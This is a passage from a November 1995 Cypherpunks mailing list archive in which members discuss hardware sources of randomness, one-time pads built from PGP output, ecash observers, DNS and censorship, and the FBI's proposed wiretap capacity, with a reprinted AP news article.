unlikely in practice.

An alternative might be the encrypted transmissions from any
communications satellite.  How many telephone calls are your
opponents able to reroute?

>--Tim May, who has both audio and video digitizers built into his Power
>Macintosh 7100av, but notes that none of the crypto programs he uses has
>any provision for using them, and so he doesn't use them for crypto
>purposes.

Note:  Please respond via e-mail as well as or instead of posting,
as I get CP-LITE instead of the whole list.

   --John Kelsey, jmkelsey at delphi.com
 PGP 2.6 fingerprint = 4FE2 F421 100F BB0A 03D1 FE06 A435 7E36


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJmz3kHx57Ag8goBAQGYiwQAkx3dxUUcGjsEKqRAlc0CTq6EaTzBrLRz
ifrKgZPxfyD9F+sBTJGGPpHWc3mtfwJwV8HeIa/MY1Z1hpssN1ZY6ELlEn+4FFIA
3A+BNjB1PKrHebVZ0WHBJ3DI3h4/olF37bYNP261Uqd8CNig+fQ3VMtE0L0frBdr
I+izpEMOwiw=
=y7To
-----END PGP SIGNATURE-----





From pmonta at qualcomm.com  Sat Nov  4 00:29:32 1995
From: pmonta at qualcomm.com (Peter Monta)
Date: Sat, 4 Nov 1995 16:29:32 +0800
Subject: Sources of randomness
Message-ID: <199511040804.AAA03552@mage.qualcomm.com>


Perry Metzger writes:

> > [ radioactive vs. other ]
>
> I didn't contend that its inferior. I contended that its difficult to
> distinguish from sources of electronic interference and is easy to get
> wrong.

Point taken; it sounds like I misread your post a bit.  Certainly
it's better to have a robust implementation than a delicate one,
but let me argue how hard it might be to get electronic sources
wrong.

> ...
> Someone can gimmick a zener diode or get it "wrong" a lot more easily
> than they can get a radation event wrong.

But how wrong is wrong?  Unless the design is catastrophically bad,
a zener source is going to give you zener noise plus some slight
admixture of interference.  Say the designer is extremely careless
and there's deterministic interference 20 dB down.  I don't see
how even that matters cryptographically---the resulting loss in
entropy will be millibits per sample.

Perhaps there ought to be a couple of standard random-bit-source
implementations, say at the CMOS-standard-cell and board-subsystem
levels, that are widely vetted and trusted (and used!).  But it's
mostly a solved problem, seems to me.

A radioactive source might be okay at the board level (though probably
costlier than its electronic counterpart), but it'd be a pain to
integrate, and it might disturb the rest of the chip.  (I'd like to
have a get_random_bit instruction as part of a microprocessor, for
example.)  Also if you want a high rate of random bits, you need many
decay events, whereas for electronic sources the corresponding
bandwidth is free---Johnson and shot noise are flat to 1 THz or so.

Interestingly enough, zener diodes and particle detectors are a lot
alike.  Zeners, if they're avalanching, already have some internal
gain; each electron crossing the junction gets so hot it knocks
off other electrons, and there's a chain reaction.  Particle detectors
take the ion trail in a suitable environment and make a nice
big pulse out of it with a similar chain-reacton effect (though
the fancier kind will give you the actual amount of charge).

Cheers,
Peter Monta   pmonta at qualcomm.com
Qualcomm, Inc./Globalstar





From perry at piermont.com  Sat Nov  4 01:40:02 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 4 Nov 1995 17:40:02 +0800
Subject: Many Topics are Appropriate for Discussion Here
In-Reply-To: <9511032235.AA13095@zorch.w3.org>
Message-ID: <199511032304.SAA00611@jekyll.piermont.com>



hallam at w3.org writes:
> 	There is a bug in mh mail that causes all mails to be rejected after
> there are more than 9999 in the same mailbox. I recieved 100 in two hours
> today so I suspect the subject line may well be related to my earlier post.

There isn't such a bug in MH, but mhe, if you are using it, won't show
more than that number. Simply split your mailbox and all is well again.

> 	Just a calibration point. The libertarians on the list do not seem
> to shrink from expressing their political views.

I don't express my general political opinions very much at all. As it
turns out, I'm a very radical libertarian, and anyone reading my stuff
elsewhere would know that, but I don't discuss this stuff in public.

> Indeed the entire discussion
> on the NSA is a political thread pure and simple.

This list *is* political in the sense that it is for people who have
chosen the view that the spread of cryptography is good. It is not,
however, a list for just *any* political discussion. The topic is
purely cryptography, and we operate largely from the viewpoint that if
you think crypto is very evil you probably should discuss that
elsewhere.

> Government regulation often provides social benefits
> it is not by definition an evil to be avoided.

I would disagree, but that is a discussion for elsewhere.

> 	If someone comes up with a crypto proposal to avoid paying taxes I
> know it will never get anywhere.

A lot of what Tim May has been talking about here for many years is
the inevitability that cryptography will weaken current financial
controls -- sooner or later, whether the central governments want it
to happen or not.

> PS I'm also none to impressed by people who make comments like "you are wrong
> about XXX but I won't explain why".

I sent you a detailed explanation, in PRIVATE mail, of why you were
wrong about governments being the only way to provide roads, including
lots of counterexamples to your claim. However, this is not libernet,
this is cypherpunks, and this isn't a place for that discussion. Thats
why I sent you PRIVATE mail.

Perry






From weidai at eskimo.com  Sat Nov  4 03:10:26 1995
From: weidai at eskimo.com (Wei Dai)
Date: Sat, 4 Nov 1995 19:10:26 +0800
Subject: Crypto++ 1.1
Message-ID: <Pine.SUN.3.91.951104024506.12530A-100000@eskimo.com>


I am still talking to RSADSI's lawyers, but it's taking a lot longer 
than I expected.  So in the mean time I've decided to rerelease the 
Crypto++ library with RC4, RC5, RSA removed, and some calls to RSAREF 
disabled.  RSADSI said it will not object to this rerelease.  Version 1.1 
also has some minor bug fixes.  You can find it at
 
ftp://ftp.csn.net/mpj/I_will_not_export/crypto_?????/libraries/crypto11.zip
 
where ????? is in ftp://ftp.csn.net/mpj/README
 
For the next version I hope to work out a deal with RSADSI to put 
some of those files back in.  I'm also planning to add SAFER and 
perhaps some elliptic curve stuff.  Other suggestions 
are welcome.
 
I encourage people to use this library in commercial as well as 
shareware/freeware products.  You don't have to pay me a cent, but 
don't forget about the patents.
 
Wei Dai
                                    
P.S. Does anyone know if elliptic curve key agreement protocols are 
patented?  






From robl at on-ramp.ior.com  Sat Nov  4 03:29:05 1995
From: robl at on-ramp.ior.com (Rob L)
Date: Sat, 4 Nov 1995 19:29:05 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
In-Reply-To: <9511030810.AA0038@cnct-gw.new-york.net>
Message-ID: <Pine.LNX.3.91.951103000534.12413A-100000@on-ramp.ior.com>


> FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
> for the data to support those numbers.  The FBI refused to release them 
> until the year 2002.
> 
> What's so special about the year 2002?  

Maybe he plans to retire and leave the country by then.. to find a more 
secure, less invasive Gov't to live under.. ;)

RobL
Rockford, Wa






From tcmay at got.net  Sat Nov  4 03:30:50 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 19:30:50 +0800
Subject: Sources of randomness
Message-ID: <acbf085205021004e36c@[205.199.118.202]>


At 9:43 PM 11/2/95, Carl Ellison wrote:
>>Date: Thu, 2 Nov 1995 00:39:29 -0800
>>From: tcmay at got.net (Timothy C. May)
>
>>Digitized video input, especially from something like a noisy channel (t.v.
>>channel, for example), is quite likely to produce a lot more entropy bits
>>per second than nearly any of us ever need. (One's PGP key could be seeded
>>in a fraction of a millisecond, for example.)
>
>My cable feed into my Mac, for example, has surprisingly little noise --
>and it's only local noise (stuff only at my house, not available to the
>eavesdropper) which counts as entropy.

I meant a t.v. channel, as in broadcast t.v., such as is easily gotten with
rabbit ears, or nothing (since the idea is to get noise, from the ether, or
from the tuner itself). A snow-filled picture has pixels which are unlikely
in the extreme to be predicted/deduced by outside attackers, who cannot
know the details of antenna orientation, microscopic variations in
geometry, LRC, tuner sensitivity, etc. That is, snowy pictures are not
guessable.

(I'm not convinced that _cable_ signals are not random enough: my cable
picture is far from perfect, and my specific cable configuration and tuner
variations are certainly contributing to variability of the image pixels.
Granted, regularities in the image that are known to attackers--this is all
in theory, of course--will serve to reduce the entropy. But there's so much
bandwidth to burn that I suspect that even cable signals are OK to use. Of
course, removing the cable input is trivial and produces a spectacularly
snowy set of images....)

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From stewarts at ix.netcom.com  Sat Nov  4 03:30:56 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 4 Nov 1995 19:30:56 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030709.XAA23931@ix8.ix.netcom.com>


At 12:03 AM 11/3/95, clark.matthews at paranet.org wrote:
>Thanks for this item!  Two little excerpts jump out at me.  They follow:
>> Last year, federal and state courts authorized 1,154 wiretaps, of which 48 
>> percent ....
>> "People are starting to say that seems awfully high," Dempsey said,
noting that
>> the overall level of such surveillance activity is now a total of 20,000 
>> to 25,000 intercepts nationwide over an entire year.

>So what is it?  1,154 wiretaps?  Or 20,000?

Perhaps that's 1154 wiretap victims, with an average of 20 intercepts each?

In a separate article, Clark posted estimates that ranged from
500K - 1.5M people could be wiretapped, depending on how many people
are in the 1%/.5%/.25% zones.  It's worse than that - if they're tapping
the average victim for (say) 3 months, that's 4 times as many victims....
And just how many cops do they plan to hire to watch all these phones?
Computers can help some, especially for data, but who's going to read it all,
even after the fancy pattern recognition systems pick out the possible good
stuff.

>FBI Director Louis Freeh testified under oath to 1,157.  The FBI was asked
>for the data to support those numbers.  The FBI refused to release them 
>until the year 2002.  [....]
>One last thing.
>What's so special about the year 2002?  

Statute of limitations?  :-)
#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From tcmay at got.net  Sat Nov  4 03:31:13 1995
From: tcmay at got.net (Timothy C. May)
Date: Sat, 4 Nov 1995 19:31:13 +0800
Subject: video as a source of public randomness
Message-ID: <acbf02ca0402100496c4@[205.199.118.202]>


At 6:23 AM 11/3/95, JMKELSEY at delphi.com wrote:

>>From: tcmay at got.net (Timothy C. May)
>>Subject: Re: Video as a source of randomness
>
>>Digitized video input, especially from something like a noisy channel (t.v.
>>channel, for example), is quite likely to produce a lot more entropy bits
>>per second than nearly any of us ever need. (One's PGP key could be seeded
>>in a fraction of a millisecond, for example.)
>
>This seems like a potential source of a stream of public random
>bits.  If these can be authenticated and matched, this kind of thing
>can be useful in a lot of protocols.  For example, if there is some

I'm not sure what you mean by "public random bits"...I don't plan to share
my random bits with anyone, nor do I see any need for "public" random bits
(except for some well-known situations involving statistical testing, for
which certain PRNGs are actually preferable to "real" random numbers).

And so there's no confusion, when I said "like a noisy channel (t.v.
channel, for example)" I meant a snowy, noisy picture such as one gets with
rabbit ears on top of the set, especially when the channel is an unused
one. It is unlikely in the extreme that any attacker could deduce the snowy
pixel values used in the distillation of entropy.

(I'm not claiming this is the most practical source of randomness; I was
just responding to an earlier post about this.)

But back to the subject of "public random bits." Could you elaborate on
what you mean by this? (I assume you don't mean a one time pad that Alice
and Bob share, since that is really a separable issue from video as a
source of randomness. Only one of them will generate the pad, and will then
securely communicate it to the other.)

What am I missing?

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."







From sjb at universe.digex.net  Sat Nov  4 05:16:47 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Sat, 4 Nov 1995 21:16:47 +0800
Subject: Info needed on observers
In-Reply-To: <v01530501acbea2598fe2@[134.184.16.171]>
Message-ID: <199511032049.PAA13455@universe.digex.net>


Leo Van Hove writes:
>I am currently preparing a paper on payment systems for the Internet
>and related issues.  I recently found out that so-called observers could
>be placed on smart cards (in order to prevent double spending, or even to
>prevent people from cheating on taxes...).
>
>To be honest that's about all I know about observers and I am very eager
>to find out more.  I am, however, having a hard time finding interesting
>references on this subject.
>
>Hence, all suggestions to get me started would be extremely welcome.
>Questions of particular interest are: possible functions (and limits),
>how 'real' are they already?, what about privacy?, ...

With ecash it's possible to duplicate a coin and spend it twice ---
it's not really any different than copying a file and printing each
copy, after all.  In most ecash schemes, the double-spender can be
detected and identified when the coins are deposited, but this could be
long enough for him to disappear, leaving the bank or the payee holding
the bag.

An "observer" is designed to create a prior restraint to
double-spending.  The observer is a tamper-resistant smart card that
must be involved in all coin transfers.  When the coin is withdrawn
from the bank, the observer's signature is needed to validate it.  When
the coin is spent, the *same* observer's signature is again needed to
validate it.  The observer won't sign the same coin twice during the
spend protocol.

To double-spend with an observer present, you'd need to bypass the
tamper resistance.





From sjb at universe.digex.net  Sat Nov  4 05:17:46 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Sat, 4 Nov 1995 21:17:46 +0800
Subject: censored? corrected [Steve Pizzo cited in The Spotlight]
In-Reply-To: <199511022000.OAA09507@galil.austnsc.tandem.com.>
Message-ID: <199511032037.PAA13172@universe.digex.net>


Sten Drescher writes:
>sameer <sameer at c2.org> said:
>> 	The US govt. doesn't run the root nameservers, nor are all the
>> root nameservers within US jurisdiction.
>
>	Granted, the US Govt doesn't run the US-based root servers.
>But, if an Internet 'Decency' law was passed, they certainly could try
>to threaten the US-based root server maintainers to make the cascading
>threats.  And, as I understand the way DNS resolution works, address
>requests go down to your root domain then up from the other root domain,
>i.e., for me to find out what c2.org's address is, my system requests
>from:
>NS mpd.tandem.com
>NS tandem.com
>NS com
>NS org
>
>If this is correct, if the com NS has the entry for the org NS, I won't
>be able to resolve those names.  Of course, explicit IP addresses and
>/etc/hosts entries would still work.

It isn't correct.  First, your host is immediately looking for a
namserver for c2.org, by querying it's configured default server (say,
piaget.mpd.tandem.com) for it.  If the server already has the answer
cached, it's returned immediately.  If not, a bit in the query tells it
whether the client wants it to find the answer or return an "I don't
know" answer -- most want it to find an answer.

Piaget.mpd.tandem.com probably already knows enough to bypass queries
to the tandem.com and com domains, since it's probably already resolved
at least one org query.  It can then go directly to a server for org to
get the c2.org information the client requested.

The other confused point you have is that there isn't just *one* server
for org.  There are at least a dozen interchangeable root nameservers
which handle all of com, org, edu, net, mil, gov, and the country
domains (us, uk, de, etc).

It's been a matter of policy for quite some time now that to register a
sub-domain under one of the top level domains (i.e., to register c2.org
under org) you must demonstrate two accessible nameservers for the new
domain.  I note, for example, that mpd.tandem.com has *four*
nameservers.

To eliminate "tandem.com" from the DNS, all of the dozen or more root
nameservers, which are in different jurisdictions, must be
compromised.  Even then, sub-domains of the top level generally offer
very long expiration periods for cached data.  It could be years before
the data left the cache from some of the second level servers, assuming
they stayed up that long.

It would almost certainly be long enough to get a judge to slap an
injunction against the action.

Once again, the net interprets censorship as damage and routes around it.





From stewarts at ix.netcom.com  Sat Nov  4 05:18:59 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 4 Nov 1995 21:18:59 +0800
Subject: FBI seeks huge wiretapping system
Message-ID: <199511030140.RAA05160@ix11.ix.netcom.com>


At 12:09 PM 11/2/95 -0500, Phill Hallam wrote:
>On telephone tapping the statement was made that they do not allow 
>unauthorized taps and that technology was making wildcat taps by
>local officials harder. Which makes sense. 

At least for the moment, wildcat taps have become much easier,
since radio-tapping cellular phones is straightforward.

>It is a fair point that just because technology has changed the 
>nature of the game it should not mean that wiretaps cease to be 
>possible.

Back before telephones, you could steam open someone's mail if they
sent it by the government post, but it was a lot harder if they sent it
by private messengers, and they could always send it in some
pre-arranged code.  And you could always hang out under the eaves
of their houses listening for conversations, but they could always
check for themselves or talk while walking down the street.
It's a fair point that just because technology has made it easier for
eavesdroppers and mail-snoops today doesn't mean that private
conversations should cease to be possible, or that we shouldn't be
able to use technology to preserve the security of our papers and effects.

>What is very odd however is the FBI request for $500 million. This is
>a somewhat large quantity of money to say the least. The telephone
>switches are programmable these days, it should be possible to 
>provide tapping at substantially less cost. 

$500 million is a drop in the bucket; they're talking about wedging themselves
into multiple places in the telephone system, taking up to 1 percent of the
capacity (without compensation as near as I can tell), and they want
the ability to do all this without the inconvenience of going out to
telephone wire offices where somebody might ask to see a warrant.

>Mind you the Federal government is not known for tight cost control. 
Indeed :-)

>The NSA reconned that a DES cracker would cost substantially more than 
>$1 million because the system costs would be much higher than the component
costs.
.... 
> Anyway the NSA price estimate was "two or more orders of magnitude more in
cost"

Wiener's design was about two orders of magnitude cheaper than Wayner's
and the DEC guy's designs, which were in turn far cheaper than any previous.
But it's a believable design, and could probably be done within a factor of
two-three of his cost predictions; "system costs" need to include things
like wiretapping equipment to steal and record the data to be cracked,
and government employees to operate it, and bureaucrats and politicians
to tell them what to do and who to target, and lots of real estate for them all.
But to reach two or more orders of magnitude cost increase,
I'd think you'd need a far bigger collection of cracking machines
that Wiener's - perhaps to crack a few hundred keys per day.

Interesting comments on banks' use of DES for authentication rather than
privacy....  of course, if the government wants to tap banks' conversations,
it can generally just demand that the banks tell them the information,
at least for US-based and other cooperative banks.

>If the NSA want a cheap DES cracker they have my number. I'll take 5%
>ot the difference between the actual cost and $100 million (their
>estimate of cost) as my fee.

As Rodney Dangerfield said "Well to start with, you gotta throw in
10% for graft and corruption."


#---
#                                       Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---






From gate at id.wing.net  Sat Nov  4 05:20:47 1995
From: gate at id.wing.net (Lee)
Date: Sat, 4 Nov 1995 21:20:47 +0800
Subject: FBI Wants to Wiretap One of Every 100 Phones in Urban Areas
Message-ID: <199511030241.VAA26248@minerva.cis.yale.edu>


FBI Wants to Wiretap One of Every 100 Phones in
Urban Areas


By MATT YANCEY

Associated Press Writer

WASHINGTON (AP) - The FBI wants the capability to simultaneously tap one 
of
every 100 phone and data transmission lines in major urban centers, but a 
top
Justice Department official said there are no plans to expand the existing 
number
of wiretaps.

As part of its effort to deal with a new breed of computer-savvy criminals 
adept
at using new telecommunications technologies, the FBI said it wants phone
companies to initially set aside 0.5 percent, or one of every 200 lines, 
for law
enforcement use in high-crime urban areas. But it added it also wants the 
ability
to rapidly expand that capability to one of every 100 lines if the need 
arises. The
disclosure was made in a little-noticed announcement in the Federal 
Register.

Despite the notice, Deputy Attorney General Jamie Gorelick said today, 
"There is
no intention to expand the number of wiretaps or the extent of wiretapping 
.. . I
don't think the American people should be worried about that."

Last year, federal and state courts authorized 1,154 wiretaps, of which 48 
percent
were sought by federal agents. Increases in recent years have mostly come 
in
drug trafficking cases. Gorelick acknowledged: "As we've gotten more 
aggressive
in the drug war, as organized gang activity has been an increased focus 
for us,
we've seen a slight increase."

The FBI proposal, unveiled on three pages of the thick daily compendium of
federal regulations and other government activities for Oct. 16, had been 
long
anticipated since the passage last year of the Communications Assistance 
for Law
Enforcement Act.

"The entire purpose of the digital telephony legislation was to leave law
enforcement in the same position it is now with respect to wiretaps: That 
is, to
ensure that emerging digital technology would not defeat current lawful
wiretaps," Gorelick said, noting that court approval would still be 
required for
any wiretap. "There appears to be some misunderstanding or 
miscommunication
as to the implications of what is contained in that notice."

But experts familiar with the law did not expect the FBI's reach into the 
world
new fiber optic cables, digital switches and high-speed modems for 
transmitting
business transactions as well as voices to be so sweeping.

"The level of capacity that the FBI is proposing here would come as a 
surprise to
many who supported the legislation," said James X. Dempsey, deputy 
director of
the Center for National Security Studies, a group that monitors government
surveillance activities.

While the federal notice does not specify which cities would be targeted, 
Dempsey
said New York is likely to be one of them. Assuming there are 2 million 
separate
phone and data transmission lines there, that means the FBI wants the 
ability to
tap 20,000 of them simultaneously, he said.

"People are starting to say that seems awfully high," Dempsey said, noting 
that
the overall level of such surveillance activity is now a total of 20,000 
to 25,000
intercepts nationwide over an entire year.

The FBI said in its official notice that its capability needs were based 
on "an
historical baseline of electronic surveillance activity" after surveying 
federal,
state and local courts, prosecutors and police agencies.

It did not offer a further explanation, but during hearings over the past 
four
years leading to passage of the 1994 law, FBI and other officials cited 
the
growing incidence of computer-based crimes.

The law was intended to remove what law enforcement officials have 
considered
a major impediment - the growing obsolescence of the copper phone wire - 
in
probing drug trafficking, organized crime, terrorism, kidnaping and 
sophisticated
new types of white-collar crime.

"Without this bill ... we would have been completely prevented in a very 
short
time from carrying out any court-approved wiretapping," FBI Director Louis
Freeh said at the time.

While law enforcement officers will still have to get court approval for 
any
wiretaps they install, the technological measures authorized by the law 
would
remove the objections of some judges.

Copper telephone lines were relatively easy to tap because they carried 
only one
conversation. But digital switches and fiber optics now in growing use 
often carry
hundreds of conversations or data transmissions at the same time, making 
it
difficult to isolate a single phone line.

The law authorized $500 million for the government to pay the phone 
companies
their cost in installing the necessary technology, but none of the money 
has been
appropriated.

And with increased criticism focused on the FBI for its role in the 1993 
Branch
Davidian siege in Waco, Texas, and the 1992 deadly standoff against white
separatist Randy Weaver in Ruby Ridge, Idaho, there is no assurance 
Congress
will be forthcoming with the money.

Legislation sent by President Clinton to Congress seeking greater wiretap
authority in the wake of the April bombing of the federal building in 
Oklahoma
City is languishing in congressional committees and is given little 
prospect of
being passed this year.



http://www.trib.com/NEWS/HEAD/FBI.html








From jya at pipeline.com  Sat Nov  4 05:37:51 1995
From: jya at pipeline.com (John Young)
Date: Sat, 4 Nov 1995 21:37:51 +0800
Subject: 800_ape
Message-ID: <199511041323.IAA16916@pipe1.nyc.pipeline.com>


   11-5-95. NYPaper Sunday Magazine:

   "Making Microsoft Safe For Capitalism. How do you restrain
   an 800-pound gorilla?" Cover story. By James Gleick.

      If the software giant has its way, it will soon be in a
      position to collect a charge for every airline ticket
      you buy, every credit card purchase you make, every fax
      you send, every picture you download, every Web site you
      visit. It's time to draw the line. But where?

      'Anything not a direct lie or clearly illegal is O.K. to
      do if it advances Microsoft's tribal cause,' Mitchell
      Kapor says. 'This licenses the worst sort of
      manipulations, lies, tortured self-justification and so
      on.'


   800_ape  (Long)








From cmckie at ccs.carleton.ca  Sat Nov  4 06:25:35 1995
From: cmckie at ccs.carleton.ca (Craig McKie)
Date: Sat, 4 Nov 1995 22:25:35 +0800
Subject: ICE Summary
Message-ID: <9511041401.AA04992@superior>


Summary of the the 2nd International Cryptogrpahy Experiment (ICE)
Workshop, Shape Technical Centre, The Hague, Sept.18-19, 1995

http://www.tis.com/crypto/ice/summary.html










From Alan.Pugh at internetMCI.COM  Sat Nov  4 07:06:29 1995
From: Alan.Pugh at internetMCI.COM (amp)
Date: Sat, 4 Nov 1995 23:06:29 +0800
Subject: using pgp to make an otp
Message-ID: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>


-- [ From: amp * EMC.Ver #2.3 ] --

-----BEGIN PGP SIGNED MESSAGE-----

greetings c-punks,

i may have posted this at some time in the past, as i have asked it
elsewhere and gotten different responses. i'm interested in that the
folx here think about it though, so here it is...

i want a source of data for use as a otp. i don't want to have to
hook up any external devices to my pc to do it. (although some of the
methods mentioned in the past few days are quite interesting.) 

i'd like to know if there was a reason not to use the output of pgp
to do it. i've been playing with the following method. i take a file
and encrypt it to a key with the '-a' flag on. this generates an
ascii file that is easily editable using simple, standard rexx calls.
i strip the first 20 or so lines and the last 20 or so lines
and put the resulting file aside. then i perform the same operation
again and append the file to the previous result. i repeat until the
file is sufficiently large for my purposes and then give the
resulting file to the person(s) i want to have it. 

i still need a program to make use of the otp i've produced, but
havent gotten that far as this is still pretty much a thought
experiment and something for me to waste time with. once i'm ready to
make use of it i'll either find a program or attempt to write
something to use to make the data i've generated useful.

i would think that the output of pgp should be pretty darn random. if
it isn't, then it's usefulness is less than its reputation imo. as
you can tell if you've read this far, i'm not a cryptographer. i just
like the stuff and am working to become more proficient in its use as
i think it is important if we are to maintain our privacy in an
increasingly digital world.

what are the holes in this? why would it be unadvisable to do it?
otoh, would it be a good basis for a otp?

amp
<0003701548 at mcimail.com>
<alan.pugh at internetmci.com>
PGP Key = 4A2683C1
November 5, 1995   1:16
 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMJxWxigP1O9KJoPBAQFzxggAmRyJlfZVt8s6shqkkvFxmSpJdyZvaSEw
O/hQEb5fJK4FuxZaIyw2Enp4Ca1/vGeEaw1Zc8JM2wSk2Km4Vjl7zlJjmIpOJ6Nw
QAJfpHwwz77NMpMiWLj/m9nwkBeQs3IPcgDywIBu2Hfw6o79bndUS+GbEoG0f/+L
jH7y0bZ+pNX/fLYaPZRnPPGVDqPn7VkfuvByT5Op5rNbHU56kSneW3bC79M1SO3K
sYXpdGYU6mWC5xbYq1eQI9sCpkdB4pftMC3cizvKdueXGTMnXbngwBnu+Hk7GONz
KOx9x6rWPJ/NBTJONiz4Scg28XelnziBP5OYXSWzBNFBoauZpcK0MQ==
=8lYe
-----END PGP SIGNATURE-----






From adam at lighthouse.homeport.org  Sat Nov  4 07:59:14 1995
From: adam at lighthouse.homeport.org (Adam Shostack)
Date: Sat, 4 Nov 1995 23:59:14 +0800
Subject: using pgp to make an otp
In-Reply-To: <01HX8P5B3MCI91XT4Q@MAIL-CLUSTER.PCY.MCI.NET>
Message-ID: <199511041555.KAA02171@homeport.org>



| i may have posted this at some time in the past, as i have asked it
| elsewhere and gotten different responses. i'm interested in that the
| folx here think about it though, so here it is...

I think you should read Marcus Ranum's OTP faq, on www.iwi.com:/pubs/

| i want a source of data for use as a otp. i don't want to have to
| hook up any external devices to my pc to do it. (although some of the
| methods mentioned in the past few days are quite interesting.)

Can't be done.  If you use a cipher to generate the pad, you have less
than full, honest to nature entropy, and you might as well use PGP.
Badly generated, or reused OTPs are very poor ciphers.

| i'd like to know if there was a reason not to use the output of pgp
| to do it. i've been playing with the following method. i take a file

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From perry at piermont.com  Sat Nov  4 09:02:05 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 5 Nov 1995 01:02:05 +0800
Subject: video as a source of public randomness
In-Reply-To: <acbf861a06021004706b@[205.199.118.202]>
Message-ID: <199511031708.MAA08978@jekyll.piermont.com>



Timothy C. May writes:
> I  don't plan to belabor this point. Radioactive decay sources are
> certainly fine, though not likely to be purchased by most people.

Video digitzation equipment connected to TV tuners turned to dead air,
your suggestion, are equally unlikely to be purchased by most
people. The geiger counters are very simple and cheap, too.

Perry





From s1113645 at tesla.cc.uottawa.ca  Sat Nov  4 09:02:06 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Sun, 5 Nov 1995 01:02:06 +0800
Subject: [noise] Re: censored with Perrymoose
In-Reply-To: <199511031355.HAA16831@mail.socketis.net>
Message-ID: <Pine.3.89.9511031008.C49857-0100000@tesla.cc.uottawa.ca>




On Fri, 3 Nov 1995, Gary Jeffers wrote:

>    Perry is again narrowly defining allowable speech on Cypherpunks.

Killfiles exist. Judging by the amount of ranting, raving, paranoia and 
please help!!! posts, isn't it inevitable that you'll get get some shut up
posts too? They make for entertaining flamewars (remember "my operating 
system is better than yours!!"? groan ). The frequency of [noise] postings 
might even be considered a decent PRNG.

Shut up shutting up ;->





From perry at piermont.com  Sat Nov  4 09:02:25 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sun, 5 Nov 1995 01:02:25 +0800
Subject: Physician, Heal Thyself
In-Reply-To: <acbf8c7e08021004f0bb@[205.199.118.202]>
Message-ID: <199511031738.MAA00170@jekyll.piermont.com>



Timothy C. May writes:
> >Tim May will doubtless disagree, but he has nothing else to do in life
>                                   ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> >than read the net so his incentives to see traffic minimized aren't
> >the same as other people's.
> 
> Perry, would you please knock off the drone of snide remarks about
> me?

It wasn't a snide remark. I believe that the fact that you are retired
and spend a considerable fraction of your day reading news and mail
alters your perspective about what is reasonable.

BTW, I thought I was in your kill file.

> You are often quick to say "What has this got to do with Cypherpunks?," but
> you yourself are perfectly willing to rant on about Nietzsche, the East
> Germans, and Louis Freeh. Physician, heal thyself.

You frequently say this sort of thing, but its groundless. My
Nietzsche comment was a sarcastic side remark and not a discussion of
Nietzsche -- I refused, in fact, to discuss him. Mentions about the
FBI's new telephony tapping requirements are on topic provided they
aren't excessive, as are comments on a wide variety of cryptography
and security related topics.

What I object to is noise. Postings about Waco, IBM microkernel
operating systems, INSLAW, and libertarianism aren't on topic. A
message noting that there is a hearing in the Bernstein trial (as with
John Gilmore), brief notices about the availabilty of online articles
on topics of interest (as with John Young), etc, are all perfectly in
order. Its when people start posting garbage that has nothing to do
with local discussion (such as whether socialism is good) that I get
mad. I think that this is not a difficult line to understand.

Perry





From tcmay at got.net  Sat Nov  4 09:02:29 1995
From: tcmay at got.net (Timothy C. May)
Date: Sun, 5 Nov 1995 01:02:29 +0800
Subject: video as a source of public randomness
Message-ID: <acbf861a06021004706b@[205.199.118.202]>


At 2:17 PM 11/3/95, Tim Philp wrote:
>        Would not generating random numbers using video sources be
>suseptable to the same 'external' influences as generating random numbers
>from radio static? External RF fields could skew the 'randomness' of the
>data.

Do a thought experiment, if not an actual experiment.

Tune your t.v. to an unused channel. Use no antenna, or perhaps just small
rabbit ears. Notice the swirl of snow (as in "Snow Crash"). Imagine
sampling bits from this snowstorm, perhaps 10 per frame. Apply the usual
tricks to remove biases in one direction or another (*) and apply hashes as
desired to distill bits of entropy.

(* Such as von Neumann's scheme to turn even biased coins into "fair"
sources: toss a coin twice and let H T be a 1 and T H be a 0.)

To complete the thought experiment: Imagine the difficulty of an attacker
being able to module this snowstorm in any predictable way. Imagine the
difficulty when the antenna input has been disconnected, or the rabbit ears
moved by air currents in the room, or....

"All crypto is economics." The cost of an attack based on modulating this
source of randomness would be in the tens of billions of dollars, or more,
and likely impossible at any cost at this time. (Depending on the sampling
details, the antenna input, etc. I'm not saying a black bag job could not
be done to alter the inputs to the t.v., just that external RF manipulation
is unlikely in the extreme to be economically feasible.)


>        As another thought, has anyone done any work on RNGs involving
>chaotic processes such as fluid dynamics and turbulent flow? I suspect
